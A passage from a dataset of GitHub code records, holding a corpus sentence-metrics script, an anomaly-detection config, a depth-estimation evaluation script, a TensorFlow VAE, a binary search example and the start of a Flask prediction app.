TypeError:\n LM = 'N/A'\n logging.debug('''\\\nmetrics: Executing with the following inputs:\n Functions: {}\n Lang & POS args of type {}\n Number of lang/POS arg rows: {}\n Markers of type {}\n Number of markers: {}\\\n'''.format(funcs, type(args), LA, type(markers), LM))\n\n def lbl(sent):\n if logging.LBL >= logging.getLogger().level:\n msg = 'metrics: Sentence:\\n'\n for line in sent:\n msg += '\\t{}\\n'.format(line)\n logging.lbl(msg)\n\n # setup\n ai, mi = iter(args), iter(markers)\n try: # test whether `funcs` is iterable\n for func in copy(funcs):\n break\n except TypeError:\n funcs = {funcs} # assert iterability\n if marker_type is STARTS and not next(copy(mi)): # skip first marker if right at beginning\n logging.debug('Skipping first marker...')\n next(mi)\n\n # compute bulk\n i = 0\n for marker in mi:\n sent = []\n while i <= marker + marker_type:\n sent.append(next(ai))\n i += 1\n lbl(sent)\n yield (func(sent) for func in funcs)\n\n # might have one more sentence if no marker at end\n lastsent = []\n end = False\n while not end:\n try:\n lastsent.append(next(ai))\n i += 1\n except StopIteration:\n end = True\n if lastsent:\n lbl(lastsent)\n yield (func(lastsent) for func in funcs)\n\n\ndef get_marker_indices(lines, marker_col=None, marker=None):\n '''extract markers as a series of row/token indices'''\n\n # debugging\n try:\n L = len(lines)\n except TypeError:\n L = 'N/A'\n logging.debug('''\\\nget_marker_indices: Executing with the following inputs...\n Lines of type {}\n Number of lines: {}\n Marker column: {}\n Marker: {}\\\n'''.format(type(lines), L, marker_col, marker))\n\n # establish marker column\n if marker_col is None:\n row1 = next(copy(lines))\n logging.warning('No marker column specified. Setting marker column to {}...'.format(len(row1) - 1))\n try:\n marker_col = len(row1) - 1 # assume marker column is the last column\n except TypeError:\n pass # rows found not to be subscriptable\n\n # create marker detection function\n if marker:\n def md(val):\n return val == marker\n else:\n def md(val):\n return val\n\n # create marker column value function\n if marker_col is None:\n def mcv(row):\n return row\n else:\n def mcv(row):\n return row[marker_col]\n\n # compute\n for i, line in enumerate(lines):\n val = mcv(line)\n detected = md(val)\n logging.lbl('get_marker_indices: Row {}: {}: {}'.format(i, val, detected))\n if detected:\n yield i\n\n\ndef metric_args(lines, lang_col=None, POS_col=None):\n '''translate each line of data into a dict of lang and POS values'''\n\n # debugging\n try:\n L = len(lines)\n except TypeError:\n L = 'N/A'\n logging.debug('''\\\nmetric_args: Executing with the following inputs:\n Lines of type {}\n Number of lines: {}\n Language column: {}\n POS column: {}\\\n'''.format(type(lines), L, lang_col, POS_col))\n\n # compute\n for line in lines:\n args = {}\n if lang_col:\n args['lang'] = line[lang_col]\n if POS_col:\n args['POS'] = line[POS_col]\n logging.lbl('metrics_args: {}'.format(args))\n yield args\n\n\ndef preprocess(lines, delimiter):\n '''split each line by the delimiter'''\n logging.debug('preprocess: Splitting lines by delimiter {}...'.format(repr(delimiter)))\n for i, line in enumerate(lines):\n lines[i] = line.split(delimiter)\n\n\ndef file_metrics(funcs, file, delimiter, first_row=True, lang_col=None, POS_col=None, marker_col=None, marker=None):\n '''perform sentence-level metrics on file contents'''\n\n # debugging\n logging.debug('''\\\nfile_metrics: Executing with the following inputs:\n Functions: {}\n File: {}\n Delimiter: {}\n Language column: {}\n POS column: {}\\\n'''.format(funcs, file, delimiter, lang_col, POS_col))\n\n # setup\n logging.debug('file_metrics: Setting up...')\n lines = file.read().splitlines()\n if not first_row:\n logging.debug('file_metrics: Skipping first row...')\n lines.pop(0)\n preprocess(lines, delimiter)\n\n # extract args and markers\n logging.debug('file_metrics: Retrieving lang & POS args...')\n args = metric_args(lines, lang_col, POS_col)\n logging.debug('file_metrics: Locating sentence markers...')\n markers = get_marker_indices(lines, marker_col, marker)\n\n # compute metrics\n logging.debug('file_metrics: Computing metrics...')\n return metrics(funcs, args, markers)\n\n\ndef _ap_parser():\n '''set up and return the argparse parser'''\n import argparse\n logging.debug('_ap_parser: Creating argument parser...')\n parser = argparse.ArgumentParser(description='Sentence-level metrics on data with sentence markers.')\n parser.add_argument(\n 'input_file',\n help='corpus file with sentence markers'\n )\n parser.add_argument(\n 'lang_col',\n type=int,\n help='column containing language tags (0-indexed)'\n )\n parser.add_argument(\n 'POS_col',\n type=int,\n help='column containing POS tags (0-indexed)'\n )\n parser.add_argument(\n 'marker_col',\n type=int,\n help='column containing sentence markers (0-indexed)'\n )\n parser.add_argument(\n 'function_file',\n help='Python script containing function(s) to evaluate. Each function should take an argument of a list of dicts in the format {\"lang\": lang_val, \"POS\": POS_val}. If in separate files, must join into single file. The script must also have a variable called \"FUNCTIONS\" as a list containing the desired functions to calculate.'\n )\n parser.add_argument(\n '-m', '--marker',\n help='marker string. if not specified, only empty entries in the marker column are ignored.'\n )\n parser.add_argument(\n '-d', '--delimiter',\n default='\\t',\n help='delimiter between columns. default: Tab'\n )\n parser.add_argument(\n '-f', '--skip_first_row',\n action='store_true',\n help='specify if the first row of the input file contents is to be skipped'\n )\n parser.add_argument(\n '-mt', '--marker_type',\n default='ENDS',\n help='STARTS (first word of sentence) or ENDS (last word of sentence). default: ENDS'\n )\n parser.add_argument(\n '-e', '--encoding',\n default='utf8',\n help='encoding type of input file. default: utf8'\n )\n parser.add_argument(\n '-o', '--output_folder',\n default=orig_wd,\n help='location to save output file with metrics'\n )\n parser.add_argument(\n '-l', '--log_level',\n help='Change the log level. Default: INFO. Type \"LBL\" for line-by-line (lower than DEBUG)'\n )\n return parser\n\n\ndef main():\n '''for command line execution'''\n\n # set up\n print()\n import os\n from datetime import datetime as dt\n from csv import writer\n global orig_wd, marker_type\n orig_wd = os.getcwd()\n cmd_args = _ap_parser().parse_args()\n if cmd_args.log_level:\n print('Setting log level to {}...'.format(cmd_args.log_level.upper()))\n logging.getLogger().setLevel(eval('logging.' + cmd_args.log_level.upper()))\n logging.info('Setting up...')\n logging.debug('Setting marker type to {}...'.format(cmd_args.marker_type))\n marker_type = eval(cmd_args.marker_type)\n input_filename = cmd_args.input_file.split('\\\\')[-1]\n input_file_title, input_file_extn = tuple(input_filename.split('.'))\n output_filename = 'Metrics on {} ({}).{}'.format(input_file_title, dt.now(), input_file_extn)\n output_file = '{}\\\\{}'.format(cmd_args.output_folder, output_filename.replace(':', '.'))\n logging.debug('Output file will be: ' + output_file)\n\n # get function(s)\n logging.info('Retrieving functions...')\n input_file_parts = cmd_args.function_file.split('\\\\')\n logging.debug('Input file parts = {}'.format(input_file_parts))\n folder = '\\\\'.join(input_file_parts[:-1])\n logging.debug('Folder = ' + folder)\n filename = input_file_parts[-1]\n if filename.endswith('.py'):\n filename = filename[:-3]\n logging.debug('File name = ' + filename)\n if folder:\n os.chdir(folder)\n logging.debug('Changed directory to ' + os.getcwd())\n exec('from {} import FUNCTIONS as funcs'.format(filename), globals())\n logging.debug('Functions imported: {}'.format(funcs))\n os.chdir(orig_wd)\n logging.debug('Changed directory to ' + os.getcwd())\n logging.debug('Functions list: {}'.format(funcs))\n\n # load input file & make generator\n logging.info('Retrieving input file contents...')\n with open(cmd_args.input_file, encoding=cmd_args.encoding.lower()) as f:\n sent_metrics = file_metrics(funcs, f, cmd_args.delimiter, not cmd_args.skip_first_row, cmd_args.lang_col, cmd_args.POS_col, cmd_args.marker_col, cmd_args.marker)\n\n # compute & write to output file\n logging.info('Computing and writing to output file...')\n with open(output_file, 'w', encoding=cmd_args.encoding.lower(), newline='\\n') as f:\n writer = writer(f, delimiter='\\t')\n writer.writerow(['Sentence No.'] + [func.__name__ for func in funcs]) # headings\n for i, metrics in enumerate(sent_metrics):\n writer.writerow([i] + list(metrics))\n logging.info('Wrote to output file at ' + output_file)\n\n print('\\nDone')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Bilingual-Annotation-Task-Force/Scripts","sub_path":"Sentence Tokenization/sentence_metrics.py","file_name":"sentence_metrics.py","file_ext":"py","file_size_in_byte":10650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18561988152","text":"import datetime\n\nexp = { 'data': 'avenue', #st, avenue\n 'data_consecutive': True,\n 'model_name': 'bitrap', #lstm_network, bitrap, bitrap_640_360\n 'K': 1,\n 'plot_images':False # Plot images\n }\n\n\nhyparams = {\n 'epochs': 1, #epoch for lstm model\n 'batch_size': 32,\n 'buffer_size': 10000,\n \n 'input_seq':5,\n 'pred_seq':5,\n 'metric': 'l2', #giou,l2, ciou diou,iou\n 'avg_or_max': 'avg', #avg \n 'errortype': 'error_flattened', #'error_diff' or 'error_summed' or 'error_flattened'\n\n 'to_xywh': True, # This is assuming file is in tlbr format\n\n 'networks': {\n 'lstm':{\n 'loss':'mse',\n 'lr': 8.726e-06,\n 'early_stopping': True,\n 'mointor':'loss',\n 'min_delta': 0.00005,\n 'patience': 15,\n 'val_ratio': 0.3,\n },\n\n }\n\n}\n\nname_exp = 'traj_model'\n\nnow = datetime.datetime.now()\ndate = now.strftime(\"%m_%d_%Y\")\ntime = now.strftime(\"%H:%M:%S\")\n\nif exp['data_consecutive']:\n model_path_list = ['results_all_datasets', 'experiment_{}'.format(name_exp), 'saved_model_consecutive']\n metrics_path_list = ['results_all_datasets', 'experiment_{}'.format(name_exp), 'metrics_plot_consecutive']\n visual_trajectory_list = ['results_all_datasets', 'experiment_{}'.format(name_exp), 'visual_trajectory_consecutive', '{}_{}_{}_{}_{}'.format(date, exp['data'], time, hyparams['input_seq'], hyparams['pred_seq'])]\n \n if exp['model_name'] == 'bitrap' or exp['model_name'] == 'bitrap_640_360' or exp['model_name'] == 'bitrap_1080_1020':\n model_path_list = ['results_all_datasets', 'experiment_{}'.format(name_exp), 'saved_model_consecutive']\n metrics_path_list = ['results_all_datasets', 'experiment_{}'.format(name_exp), 'metrics_plot_consecutive_bitrap']\n visual_trajectory_list = ['results_all_datasets', 'experiment_{}'.format(name_exp), 'visual_trajectory_consecutive_bitrap', '{}_{}_{}_{}'.format(date, exp['data'], hyparams['input_seq'], hyparams['pred_seq'])]\n\nelse:\n model_path_list = ['results_all_datasets', 'experiment_{}'.format(name_exp), 'saved_model']\n metrics_path_list ['results_all_datasets', 'experiment_{}'.format(name_exp), 'metrics_plot']\n visual_trajectory_list = ['results_all_datasets', 'experiment_{}'.format(name_exp), 'visual_trajectory', '{}_{}_{}_{}_{}'.format(date, exp['data'], time, hyparams['input_seq'], hyparams['pred_seq'])]\n\n\nloc = {\n # if I'm running a test where don't want to save anything\n # how do I do that. Maybe move them to tmp\n \n 'model_path_list': model_path_list,\n 'metrics_path_list': metrics_path_list, \n 'visual_trajectory_list': visual_trajectory_list,\n \n 'nc':{\n 'model_name': exp['model_name'],\n 'model_name_binary_classifer': 'binary_network',\n 'data_coordinate_out': 'xywh',\n 'dataset_name': exp['data'], # avenue, st \n 'date': date,\n }, \n\n 'data_load':{\n 'avenue':{\n # These are good because these locations are perm unless I manually move them\n 'train_file': \"/mnt/roahm/users/akanu/projects/anomalous_pred/output_deepsort/avenue/train_txt/\",\n 'test_file': \"/mnt/roahm/users/akanu/projects/anomalous_pred/output_deepsort/avenue/test_txt/\",\n 'train_vid': '/mnt/roahm/users/akanu/dataset/Anomaly/Avenue_Dataset/training_videos',\n 'test_vid': '/mnt/roahm/users/akanu/dataset/Anomaly/Avenue_Dataset/testing_videos',\n 'pic_loc_test': '/mnt/roahm/users/akanu/dataset/Anomaly/Avenue_Dataset/frames_of_vid/test/'\n },\n\n 'st':{\n 'train_file':\"/mnt/roahm/users/akanu/projects/anomalous_pred/output_deepsort/st/train_txt/\",\n \"test_file\": \"/mnt/roahm/users/akanu/projects/anomalous_pred/output_deepsort/st/test_txt/\",\n 'train_vid': '/mnt/workspace/datasets/shanghaitech/training/videos',\n 'test_vid': '/mnt/roahm/users/akanu/projects/Deep-SORT-YOLOv4/tensorflow2.0/deep-sort-yolov4/input_video/st_test',\n 'pic_loc_test':'/mnt/workspace/datasets/shanghaitech/testing/frames'\n },\n 'hr-st':{\n 'train_file':\"/mnt/roahm/users/akanu/projects/anomalous_pred/output_deepsort/HR-ShanghaiTech/train_txt/\",\n \"test_file\": \"/mnt/roahm/users/akanu/projects/anomalous_pred/output_deepsort/HR-ShanghaiTech/test_txt/\",\n 'train_vid': '/mnt/workspace/datasets/shanghaitech/training/videos',\n 'test_vid': '/mnt/roahm/users/akanu/projects/Deep-SORT-YOLOv4/tensorflow2.0/deep-sort-yolov4/input_video/st_test',\n },\n },\n \n 'pkl_file':{\n 'avenue': \"/home/akanu/output_bitrap/avenue_unimodal/gaussian_avenue_in_{}_out_{}_K_{}.pkl\".format(hyparams['input_seq'],\n hyparams['pred_seq'],\n exp['K']),\n\n 'avenue_template': \"/home/akanu/output_bitrap/avenue_unimodal/gaussian_avenue_in_{}_out_{}_K_{}.pkl\",\n 'avenue_template_skip': \"/home/akanu/output_bitrap/avenue_unimodal/gaussian_avenue_in_{}_out_{}_K_{}_skip_{}.pkl\",\n\n 'st': \"/home/akanu/output_bitrap/st_unimodal/gaussian_st_in_{}_out_{}_K_{}.pkl\".format(hyparams['input_seq'],\n hyparams['pred_seq'],\n exp['K']),\n\n 'st_template': \"/home/akanu/output_bitrap/st_unimodal/gaussian_st_in_{}_out_{}_K_{}.pkl\",\n 'st_template_skip': \"/home/akanu/output_bitrap/st_unimodal/gaussian_st_in_{}_out_{}_K_{}_skip_{}.pkl\",\n \n \n }\n\n\n}\n","repo_name":"akanuasiegbu/Leveraging-Trajectory-Prediction-for-Pedestrian-Video-Anomaly-Detection","sub_path":"experiments_code/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":6011,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"25349315538","text":"from __future__ import absolute_import, division, print_function\n\nimport os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import mean_absolute_error as MAE\nimport torch\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nimport copy \n\nfrom layers import disp_to_depth\nfrom utils import readlines\nfrom options import MonodepthOptions\nimport datasets\nimport networks\n\ncv2.setNumThreads(0) # This speeds up evaluation 5x on our unix systems (OpenCV 3.3.1)\n\n\nsplits_dir = os.path.join(os.path.dirname(__file__), \"splits\")\n\n# Models which were trained with stereo supervision were trained with a nominal\n# baseline of 0.1 units. The KITTI rig has a baseline of 54cm. Therefore,\n# to convert our stereo predictions to real-world scale we multiply our depths by 5.4.\nSTEREO_SCALE_FACTOR = 5.4\n\n\ndef compute_errors(gt, pred):\n \"\"\"Computation of error metrics between predicted and ground truth depths\n \"\"\"\n thresh = np.maximum((gt / pred), (pred / gt))\n a1 = (thresh < 1.25 ).mean()\n a2 = (thresh < 1.25 ** 2).mean()\n a3 = (thresh < 1.25 ** 3).mean()\n\n rmse = (gt - pred) ** 2\n rmse = np.sqrt(rmse.mean())\n\n rmse_log = (np.log(gt) - np.log(pred)) ** 2\n rmse_log = np.sqrt(rmse_log.mean())\n\n abs_rel = np.mean(np.abs(gt - pred) / gt)\n\n sq_rel = np.mean(((gt - pred) ** 2) / gt)\n\n return [abs_rel, sq_rel, rmse, rmse_log, a1, a2, a3]\n\n\ndef batch_post_process_disparity(l_disp, r_disp):\n \"\"\"Apply the disparity post-processing method as introduced in Monodepthv1\n \"\"\"\n _, h, w = l_disp.shape\n m_disp = 0.5 * (l_disp + r_disp)\n l, _ = np.meshgrid(np.linspace(0, 1, w), np.linspace(0, 1, h))\n l_mask = (1.0 - np.clip(20 * (l - 0.05), 0, 1))[None, ...]\n r_mask = l_mask[:, :, ::-1]\n return r_mask * l_disp + l_mask * r_disp + (1.0 - l_mask - r_mask) * m_disp\n\n\ndef evaluate(opt):\n \"\"\"Evaluates a pretrained model using a specified test set\n \"\"\"\n MIN_DEPTH = 1e-3\n MAX_DEPTH = 80\n\n assert sum((opt.eval_mono, opt.eval_stereo)) == 1, \\\n \"Please choose mono or stereo evaluation by setting either --eval_mono or --eval_stereo\"\n\n if opt.ext_disp_to_eval is None:\n\n opt.load_weights_folder = os.path.expanduser(opt.load_weights_folder)\n\n assert os.path.isdir(opt.load_weights_folder), \\\n \"Cannot find a folder at {}\".format(opt.load_weights_folder)\n\n print(\"-> Loading weights from {}\".format(opt.load_weights_folder))\n\n filenames = readlines(os.path.join(splits_dir, opt.eval_split, \"test_files.txt\"))\n if opt.eval_validation:\n filenames = readlines(os.path.join(splits_dir, opt.split, \"val_files.txt\"))\n encoder_path = os.path.join(opt.load_weights_folder, \"encoder.pth\")\n decoder_path = os.path.join(opt.load_weights_folder, \"depth.pth\")\n visibility_net_path = os.path.join(opt.load_weights_folder, 'visibility_net.pth')\n encoder_dict = torch.load(encoder_path)\n img_ext = '.png' if opt.png else '.jpg'\n dataset = datasets.KITTIRAWDataset(opt.data_path, filenames,\n encoder_dict['height'], encoder_dict['width'],\n [0], 4, is_train=False, img_ext=img_ext)\n dataloader = DataLoader(dataset, opt.batch_size, shuffle=False, num_workers=opt.num_workers,\n pin_memory=True, drop_last=False)\n if opt.backbone == \"resnet\":\n encoder_type = \"resnet\"\n encoder = networks.ResnetEncoder(opt.num_layers, False)\n elif opt.backbone == \"mobile_net_v3\":\n encoder_type = \"mobile\"\n encoder = networks.MobileEncoder(False)\n elif opt.backbone == \"densenet\":\n encoder_type = \"densenet\"\n encoder = networks.DenseNetEncoder(121, False)\n if opt.depth_decoder == \"basic\":\n depth_decoder = networks.DepthDecoder(encoder.num_ch_enc)\n elif opt.depth_decoder == \"hr_depth\":\n depth_decoder = networks.HRDepthDecoder(encoder.num_ch_enc, encoder_type=encoder_type)\n\n if opt.predict_visibility:\n visibility_net = networks.VisibilityNet2(encoder.num_ch_enc)\n visibility_net.cuda()\n visibility_net.eval()\n visibility_net.load_state_dict(torch.load(visibility_net_path))\n\n model_dict = encoder.state_dict()\n encoder.load_state_dict({k: v for k, v in encoder_dict.items() if k in model_dict})\n depth_decoder.load_state_dict(torch.load(decoder_path))\n\n\n encoder.cuda()\n encoder.eval()\n depth_decoder.cuda()\n depth_decoder.eval()\n\n pred_disps = []\n pred_depths = []\n pred_max_depths = []\n gt_max_depths = []\n max_depths_mse = []\n fnames = []\n # color_imgs = []\n \n print(\"-> Computing predictions with size {}x{}\".format(\n encoder_dict['width'], encoder_dict['height']))\n import time\n start_time = time.time()\n with torch.no_grad():\n for data in tqdm(dataloader):\n input_color = data[(\"color\", 0, 0)].cuda()\n if opt.eval_return_result:\n # color_imgs.append(copy.deepcopy(data[(\"color\", 0, 0)]))\n fnames.append(data['filename'])\n if opt.post_process:\n # Post-processed results require each image to have two forward passes\n input_color = torch.cat((input_color, torch.flip(input_color, [3])), 0)\n\n features = encoder(input_color)\n output = depth_decoder(features)\n\n if opt.predict_visibility:\n output['max_depth'] = visibility_net(features)\n max_depth = output['max_depth'].reshape(-1,1,1,1)\n for d in output[\"max_depth\"]:\n pred_max_depths.append(d[0].item())\n for d in data[\"depth_gt\"].cpu().numpy():\n gt_max_depths.append(np.max(d))\n else:\n max_depth = opt.max_depth\n\n pred_disp, pred_depth = disp_to_depth(output[(\"disp\", 0)], opt.min_depth, max_depth)\n pred_disp = pred_disp.cpu()[:, 0].numpy()\n \n # if opt.eval_return_result:\n # pred_depth = pred_depth.cpu()[:, 0].numpy()\n # pred_depths.append(pred_depth)\n\n if opt.post_process:\n N = pred_disp.shape[0] // 2\n pred_disp = batch_post_process_disparity(pred_disp[:N], pred_disp[N:, :, ::-1])\n\n pred_disps.append(pred_disp)\n\n pred_disps = np.concatenate(pred_disps)\n end_time = time.time()\n print(f'Predicting duration {end_time-start_time}')\n\n else:\n # Load predictions from file\n print(\"-> Loading predictions from {}\".format(opt.ext_disp_to_eval))\n pred_disps = np.load(opt.ext_disp_to_eval)\n\n if opt.eval_eigen_to_benchmark:\n eigen_to_benchmark_ids = np.load(\n os.path.join(splits_dir, \"benchmark\", \"eigen_to_benchmark_ids.npy\"))\n\n pred_disps = pred_disps[eigen_to_benchmark_ids]\n\n if opt.save_pred_disps:\n if opt.eval_validation:\n output_path = os.path.join(\n opt.load_weights_folder, \"disps_{}_split.npy\".format(opt.split))\n print(\"-> Saving predicted disparities to \", output_path)\n np.save(output_path, pred_disps)\n else:\n output_path = os.path.join(\n opt.load_weights_folder, \"disps_{}_split2.npy\".format(opt.eval_split))\n print(\"-> Saving predicted disparities to \", output_path)\n np.save(output_path, pred_disps)\n \n output_path = os.path.join(\n opt.load_weights_folder, \"max_depth_{}_split2.npy\".format(opt.eval_split))\n print(\"-> Saving predicted max_depth to \", output_path)\n np.save(output_path, pred_max_depths)\n\n if opt.no_eval:\n print(\"-> Evaluation disabled. Done.\")\n quit()\n\n elif opt.eval_split == 'benchmark':\n save_dir = os.path.join(opt.load_weights_folder, \"benchmark_predictions\")\n print(\"-> Saving out benchmark predictions to {}\".format(save_dir))\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n for idx in range(len(pred_disps)):\n disp_resized = cv2.resize(pred_disps[idx], (1216, 352))\n depth = STEREO_SCALE_FACTOR / disp_resized\n depth = np.clip(depth, 0, 80)\n depth = np.uint16(depth * 256)\n save_path = os.path.join(save_dir, \"{:010d}.png\".format(idx))\n cv2.imwrite(save_path, depth)\n\n print(\"-> No ground truth is available for the KITTI benchmark, so not evaluating. Done.\")\n quit()\n\n gt_path = os.path.join(splits_dir, opt.eval_split, \"gt_depths.npz\")\n gt_depths = np.load(gt_path, allow_pickle=True, fix_imports=True, encoding='latin1')[\"data\"]\n\n print(\"-> Evaluating\")\n\n if opt.eval_stereo:\n print(\" Stereo evaluation - \"\n \"disabling median scaling, scaling by {}\".format(STEREO_SCALE_FACTOR))\n opt.disable_median_scaling = True\n opt.pred_depth_scale_factor = STEREO_SCALE_FACTOR\n else:\n print(\" Mono evaluation - using median scaling\")\n\n errors = []\n abs_rels = []\n ratios = []\n rs_gt_depths = []\n\n for i in tqdm(range(pred_disps.shape[0])):\n\n gt_depth = gt_depths[i]\n gt_height, gt_width = gt_depth.shape[:2]\n\n pred_disp = pred_disps[i]\n pred_disp = cv2.resize(pred_disp, (gt_width, gt_height))\n pred_depth = 1 / pred_disp\n \n \n if opt.eval_split == \"eigen\":\n mask = np.logical_and(gt_depth > MIN_DEPTH, gt_depth < MAX_DEPTH)\n\n crop = np.array([0.40810811 * gt_height, 0.99189189 * gt_height,\n 0.03594771 * gt_width, 0.96405229 * gt_width]).astype(np.int32)\n crop_mask = np.zeros(mask.shape)\n crop_mask[crop[0]:crop[1], crop[2]:crop[3]] = 1\n mask = np.logical_and(mask, crop_mask)\n\n else:\n mask = gt_depth > 0\n\n pred_depth = pred_depth[mask]\n gt_depth = gt_depth[mask]\n\n pred_depth *= opt.pred_depth_scale_factor\n if not opt.disable_median_scaling:\n ratio = np.median(gt_depth) / np.median(pred_depth)\n ratios.append(ratio)\n pred_depth *= ratio\n\n pred_depth[pred_depth < MIN_DEPTH] = MIN_DEPTH\n pred_depth[pred_depth > MAX_DEPTH] = MAX_DEPTH\n\n if opt.eval_return_result:\n pred_depths.append(copy.deepcopy(pred_depth))\n rs_gt_depths.append(copy.deepcopy(gt_depth))\n\n\n error = compute_errors(gt_depth, pred_depth)\n abs_rels.append(error[0])\n errors.append(error)\n\n if not opt.disable_median_scaling:\n ratios = np.array(ratios)\n med = np.median(ratios)\n print(\" Scaling ratios | med: {:0.3f} | std: {:0.3f}\".format(med, np.std(ratios / med)))\n \n mean_errors = np.array(errors).mean(0)\n if opt.predict_visibility:\n max_depth_mse = MAE(gt_max_depths, pred_max_depths)\n max_depth_abs_rel = np.mean(np.abs(np.array(gt_max_depths) - np.array(pred_max_depths))) / np.array(gt_max_depths)\n else:\n max_depth_mse = -1\n mean_errors = mean_errors.tolist()\n mean_errors.append(max_depth_mse)\n #print(max_depth_abs_rel)\n print(\"\\n \" + (\"{:>8} | \" * 8).format(\"abs_rel\", \"sq_rel\", \"rmse\", \"rmse_log\", \"a1\", \"a2\", \"a3\", \"md_mae\"))\n print((\"&{: 8.3f} \" * 8).format(*mean_errors) + \"\\\\\\\\\")\n print(\"\\n-> Done!\")\n \n if opt.eval_return_result:\n return rs_gt_depths, pred_depths, pred_disps, errors, ratios, pred_max_depths\n\nif __name__ == \"__main__\":\n options = MonodepthOptions()\n evaluate(options.parse())\n","repo_name":"huyduong7101/monocular_depth_estimation","sub_path":"evaluate_depth.py","file_name":"evaluate_depth.py","file_ext":"py","file_size_in_byte":11983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33869355140","text":"'''\nSefika Efeoglu\n'''\nimport tensorflow as tf\nimport numpy as np\nimport glob, random, os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nclass VariationalAutoencoderConfigBase(object):\n '''Configuration General Class'''\n \n def __init__(self, config=1):\n \n if config == 2:\n self.encoder_filter = [4, 8, 16, 32]\n self.decoder_filter = [32, 16, 4, 3]\n elif config == 3:\n self.encoder_filter = [16, 32, 64, 128]\n self.decoder_filter = [64, 32, 16, 3]\n elif config == 4:\n self.encoder_filter = [64, 128, 256, 512]\n self.decoder_filter = [256, 128, 64, 3]\n elif config == 1:\n self.encoder_filter = [32, 64, 128, 256]\n self.decoder_filter = [128, 64, 32, 3]\n\n self.image = tf.placeholder(tf.float32, [None, 96, 96, 3], name='image')\n self.resized_image = tf.image.resize_images(self.image, [64, 64])\n tf.summary.image('resized_image', self.resized_image, 20)\n\n self.z_mu, self.z_logvar = self.encoder(self.resized_image,self.encoder_filter)\n self.z = self.sample_z(self.z_mu, self.z_logvar)\n self.reconstructions = self.decoder(self.z, self.decoder_filter)\n tf.summary.image('reconstructions', self.reconstructions, 20)\n\n self.merged = tf.summary.merge_all()\n\n self.loss = self.compute_loss()\n\n def sample_z(self, mu, logvar):\n eps = tf.random_normal(shape=tf.shape(mu))\n return mu + tf.exp(logvar / 2) * eps\n\n\n def compute_loss(self):\n logits_flat = tf.layers.flatten(self.reconstructions)\n labels_flat = tf.layers.flatten(self.resized_image)\n reconstruction_loss = tf.reduce_sum(tf.square(logits_flat - labels_flat), axis = 1)\n kl_loss = 0.5 * tf.reduce_sum(tf.exp(self.z_logvar) + self.z_mu**2 - 1. - self.z_logvar, 1)\n vae_loss = tf.reduce_mean(reconstruction_loss + kl_loss)\n return vae_loss\n\n def encoder(self, x, filter_list):\n x = tf.layers.conv2d(x, filters=filter_list[0], kernel_size=4, strides=2, padding='valid', activation=tf.nn.relu)\n x = tf.layers.conv2d(x, filters=filter_list[1], kernel_size=4, strides=2, padding='valid', activation=tf.nn.relu)\n x = tf.layers.conv2d(x, filters=filter_list[2], kernel_size=4, strides=2, padding='valid', activation=tf.nn.relu)\n x = tf.layers.conv2d(x, filters=filter_list[3], kernel_size=4, strides=2, padding='valid', activation=tf.nn.relu)\n\n x = tf.layers.flatten(x)\n z_mu = tf.layers.dense(x, units=32, name='z_mu')\n z_logvar = tf.layers.dense(x, units=32, name='z_logvar')\n return z_mu, z_logvar\n\n def decoder(self, z, filter_list):\n x = tf.layers.dense(z, 1024, activation=None)\n x = tf.reshape(x, [-1, 1, 1, 1024])\n x = tf.layers.conv2d_transpose(x, filters=filter_list[0], kernel_size=5, strides=2, padding='valid', activation=tf.nn.relu)\n x = tf.layers.conv2d_transpose(x, filters=filter_list[1], kernel_size=5, strides=2, padding='valid', activation=tf.nn.relu)\n x = tf.layers.conv2d_transpose(x, filters=filter_list[2], kernel_size=6, strides=2, padding='valid', activation=tf.nn.relu)\n x = tf.layers.conv2d_transpose(x, filters=filter_list[3], kernel_size=6, strides=2, padding='valid', activation=tf.nn.sigmoid)\n return x\n","repo_name":"sefeoglu/gym_self_drive","sub_path":"gym_self_drive/model/VAE_RL/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19942711285","text":"pos = -1\n\ndef search(list, n):\n s = 0\n e = len(list) - 1\n\n while s <= e:\n m = (s + e) // 2 # // is used to get Integer Division\n\n if list[m] == n:\n globals()['pos'] = m\n return True\n elif list[m] < n:\n s = m + 1\n else:\n e = m - 1\n return False\n\n\nlist = [2, 3, 5, 6, 8, 9, 23, 34, 45, 67, 89, 90]\nn = 8\n\nif search(list, n):\n print(\"Found at\",pos)\nelse:\n print(\"Not Found\")","repo_name":"pmihsan/SampleCodes","sub_path":"Python/Searching and Sorting/BinarySearch.py","file_name":"BinarySearch.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1770306146","text":"from flask import Flask,render_template,url_for,request\r\nimport numpy as np\r\nfrom sklearn.pipeline import make_pipeline\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nfrom sklearn.compose import ColumnTransformer\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('home.html' , methods=['GET', 'POST'])\r\n\r\n@app.route('/prediction' , methods=['GET', 'POST'])\r\ndef prediction():\r\n import pickle\r\n model = pickle.load(open('model.pkl','rb'))\r\n if request.method == 'POST':\r\n IsFirstTime = request.form['IsFirstTime'] \r\n MIP = request.form['MIP'] \r\n Units = request.form['Units'] \r\n OCLTV = request.form['OCLTV'] \r\n DTI = request.form['DTI'] \r\n OrigUPB = request.form['OrigUPB'] \r\n OrigInterestRate = request.form['OrigInterestRate']\r\n OrigLoanTerm = request.form['OrigLoanTerm']\r\n CreditRange = request.form['CreditRange']\r\n LTVRange = request.form['LTVRange']\r\n RepayRange = request.form['RepayRange']\r\n data = [IsFirstTime,MIP,Units,OCLTV,DTI,OrigUPB,OrigInterestRate,OrigLoanTerm,CreditRange,LTVRange,RepayRange]\r\n input = 